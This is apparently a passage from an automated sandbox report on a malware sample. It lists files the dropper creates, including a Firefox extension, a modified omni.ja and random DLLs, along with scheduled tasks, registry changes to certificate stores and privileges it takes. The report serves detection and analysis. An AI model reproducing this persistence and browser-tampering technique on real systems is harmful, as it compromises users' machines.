File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\dlfHiRefefjU2\TNLDjta.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\dlfHiRefefjU2\GugQAQCtImRTv.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\hsUwQAlMU\XoMgzde.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\efurrXQ.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\QtKEgKYoTGTqC\EArZmcm.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\ZEkGlaTFWGUn\iCnXUol.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\hsUwQAlMU\uQQtmT.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\Tmqpqut.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File created C:\Program Files (x86)\QtKEgKYoTGTqC\pHrZIsI.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2a71c9-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2a71c9-0000-0000-0000-d01200000000} C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d6d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2a71c9-0000-0000-0000-d01200000000} C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
